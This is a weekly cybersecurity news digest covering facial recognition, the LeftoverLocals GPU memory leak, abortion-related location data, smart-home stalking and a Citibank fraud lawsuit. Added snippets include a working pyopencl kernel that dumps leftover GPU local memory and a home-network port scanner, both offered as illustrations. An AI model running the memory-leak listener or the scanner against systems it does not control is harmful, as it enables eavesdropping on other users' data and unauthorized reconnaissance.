Pete Recommends – Weekly highlights on cyber security issues, February 3, 2024

Subject: Amazon says DOJ disclosure doesn’t indicate violation of facial recognition moratorium
Source: FedScoop
https://fedscoop.com/amazon-response-doj-fbi-use-rekognition-software/

The statement came after FedScoop reported that, according to the DOJ, the FBI is in the “initiation” phase of using Rekognition.

In an emailed response to FedScoop, Amazon spokesperson Duncan Neasham said: “We imposed a moratorium on police departments’ use of Amazon Rekognition’s face comparison feature in connection with criminal investigations in June 2020, and to suggest we have relaxed this moratorium is false. Rekognition is an image and video analysis service that has many non-facial analysis and comparison features. Nothing in the Department of Justice’s disclosure indicates the FBI is violating the moratorium in any way.”

According to Amazon’s terms of service, the company placed a moratorium on the “use of Amazon Rekognition’s face comparison feature by police departments in connection with criminal investigations. This moratorium does not apply to use of Amazon Rekognition’s face comparison feature to help identify or locate missing persons.”
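
For context on those non-facial features, here is a minimal boto3 sketch (ours, not from the article or Amazon’s statement) calling Rekognition’s label-detection API, one of the image-analysis features unrelated to face comparison. The file name and region are placeholders:

# Label detection: a non-facial Rekognition feature (illustrative sketch).
import boto3

# Assumes AWS credentials are already configured; "photo.jpg" is hypothetical.
client = boto3.client("rekognition", region_name="us-east-1")

with open("photo.jpg", "rb") as f:
    resp = client.detect_labels(Image={"Bytes": f.read()}, MaxLabels=10)

for label in resp["Labels"]:
    print(f"{label['Name']}: {label['Confidence']:.1f}%")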

Filed: https://fedscoop.com/category/ai/

RSS: https://fedscoop.com/category/ai/feed/


Subject: LeftoverLocals: Listening to LLM responses through leaked GPU local memory
Source: Trail of Bits Blog via Sabrina
https://blog.trailofbits.com/2024/01/16/leftoverlocals-listening-to-llm-responses-through-leaked-gpu-local-memory/

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries.

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details…

Exploit brief – GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had significant consequences for applications. Historically, this meant that GPU hardware and software stacks iterated rapidly, with frequent major changes to architectures and programming models. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA provides only a few short tables. This type of vague specification has led to alarming issues, both past and present, as LeftoverLocals exemplifies.
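
To make the bug class concrete, here is a minimal pyopencl sketch (our illustration, not Trail of Bits’ actual PoC, which pairs a writer and a listener across several GPU APIs) of the “listener” pattern the post describes: a kernel dumps local memory it never initialized, and any non-zero words are potential leftovers from an earlier kernel. The workgroup size of 256 is an assumption; on patched or unaffected platforms the dump should be all zeros.

# Minimal LeftoverLocals-style "listener" sketch (illustrative only).
import numpy as np
import pyopencl as cl

KERNEL = """
__kernel void listener(__global uint *dump, __local uint *lm) {
    // Read local memory this kernel never wrote. On vulnerable GPUs
    // it may still hold another process's data ("leftovers").
    dump[get_global_id(0)] = lm[get_local_id(0)];
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, KERNEL).build()

WORDS = 256  # assumes the device supports a 256-thread workgroup
out = np.zeros(WORDS, dtype=np.uint32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)

# One workgroup; pass 1 KiB of (uninitialized) local memory to the kernel.
prog.listener(queue, (WORDS,), (WORDS,), out_buf, cl.LocalMemory(out.nbytes))
cl.enqueue_copy(queue, out, out_buf)

print(f"non-zero leftover words: {np.count_nonzero(out)} / {WORDS}")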

Posted in: Machine Learning, Vulnerability Disclosure

RSS for blog: https://blog.trailofbits.com/feed/


Subject: Google is Still Failing to Protect Privacy of Abortion Seekers
Source: Accountable Tech
https://accountabletech.org/statements/new-research-google-is-still-failing-to-protect-privacy-of-abortion-seekers/

Data gathered by Accountable Tech in seven states found that Google still collects and retains Location History data for visits to abortion clinics, despite promising 18 months ago to “delete these entries.”

Accountable Tech published new research today showing Google’s continued failure to delete users’ sensitive location data despite a July 2022 commitment to protect the privacy of abortion seekers after the fall of Roe v. Wade. On the heels of Google’s latest announcement that it will soon store Location History data on individual devices and encrypt cloud backups, this report makes it clear that Google cannot be trusted to follow through on its privacy promises.

In the eight experiments Accountable Tech ran across seven states, Google retained Location History data about 50% of the time. While that is an improvement over our initial research, a person seeking an abortion faces coin-flip odds that their location data is still being retained by Google, where it could be used to prosecute them…


Subject: How to lock out your ex-partner from your smart home
Source: Malwarebytes
https://www.malwarebytes.com/blog/news/2024/01/how-to-lock-out-your-ex-partner-from-your-smart-home

[infomercial … ] Stalkers can use all kinds of apps, gadgets, devices, and phones to spy on their targets, who are often their ex-partners. Unfortunately, while they no doubt have many positive uses, smart home devices give stalkers an array of tools to keep an eye on their targets.

If you are the partner who stays in the house you shared together, you need to make sure that you lock out your ex-partner. This may seem unnecessarily painful at first, but it’s better to be safe than sorry. Your ex doesn’t need to be a hacker when he still has access.

Consider the apps you have shared from your phone. Some of these apps can be queried for information about where, when, and with which device they were last accessed. If you want to keep those apps, make sure you have full control and nobody else has access.

Any camera in your house surely stores more footage of you and your family than of any burglar, and this footage is usually stored in the cloud. That means it can be viewed by anyone who has the correct login credentials. And while most people will think of security cameras and baby monitors, they may overlook less obvious smart appliances.

A smart doorbell can give away who comes to visit you and when. The setting of your smart thermostat can reveal whether you are at home, in your bed, or if you went out for a while. Even smart lighting systems may give away information about your location inside the house or whether you’ve gone out. Your ex will know some of your habits and can use that to interpret the information provided by smart appliances.

Other smart appliances that may reveal information about you or your whereabouts include your TV, coffee maker, oven, refrigerator, and cleaning robot. Someone could also use these smart appliances to make your life miserable. They may be able to remotely turn up the heat, flash your lights, defrost your refrigerator, set a timer for your oven, and so on.
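
A practical first step toward that lockout is knowing what is actually on your network. Below is a minimal Python sketch (ours, not from the Malwarebytes article) that probes a hypothetical 192.168.1.0/24 home subnet for a few ports commonly used by cameras, smart hubs, and MQTT brokers; adjust the subnet and port list for your own network before changing any credentials:

# Quick smart-home inventory scan (illustrative; scan only networks you own).
import socket
from concurrent.futures import ThreadPoolExecutor

SUBNET = "192.168.1."                      # hypothetical home subnet
PORTS = [80, 443, 554, 1883, 8080, 8883]   # HTTP(S), RTSP cameras, MQTT

def probe(target):
    host, port = target
    try:
        # A successful TCP connect suggests a device service at host:port.
        with socket.create_connection((host, port), timeout=0.5):
            return f"{host}:{port} open"
    except OSError:
        return None  # closed, filtered, or no host at this address

targets = [(f"{SUBNET}{i}", port) for i in range(1, 255) for port in PORTS]
with ThreadPoolExecutor(max_workers=64) as pool:
    for hit in filter(None, pool.map(probe, targets)):
        print(hit)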

How to lock out your ex-partner from your smart home…


Subject: Citibank fails to protect customers from fraud, N.Y. AG’s lawsuit contends
Source: UPI.com
https://www.upi.com/Top_News/US/2024/01/30/new-york-attorney-general-sues-citibank-for-failure-to-protect-customers/2971706635781/

Jan. 30 (UPI) — New York Attorney General Letitia James filed suit Tuesday against Citibank for allegedly failing to protect customers from fraud and to reimburse victims. “The lawsuit alleges that Citi does not implement strong online protections to stop unauthorized account takeovers, misleads account holders about their rights after their accounts are hacked and funds are stolen, and illegally denies reimbursement to victims of fraud,” James said in a press release Tuesday.

In a statement Tuesday, Citibank suggested certain kinds of fraud are beyond its control.

“Banks are not required to make customers whole when those customers follow criminals’ instructions and banks can see no indication the customers are being deceived,” Citibank said in a statement Tuesday, according to CNBC.

Posted in: AI, Cybersecurity, Healthcare, Privacy, Search Engines